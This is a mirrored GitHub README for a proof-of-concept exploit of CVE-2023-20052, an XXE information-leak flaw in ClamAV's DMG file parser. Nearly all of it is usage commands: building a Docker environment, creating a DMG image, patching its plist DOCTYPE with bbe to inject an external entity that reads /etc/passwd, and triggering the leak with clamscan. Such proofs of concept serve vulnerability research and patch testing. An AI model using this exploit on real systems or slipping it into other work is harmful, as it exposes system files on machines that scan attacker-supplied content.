Giters

nokn0wthing / CVE-2023-20052

CVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2023-20052

CVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV

Usage
To create malicious DMG file

git clone https://github.com/nokn0wthing/CVE-2023-20052.git
cd CVE-2023-20052
sudo docker build -t cve-2023-20052 .
sudo docker run -v $(pwd):/exploit -it cve-2023-20052 bash

genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit.dmg

To trigger exploit
clamscan --debug exploit.dmg

About

CVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV

Languages

Language:Dockerfile 100.0%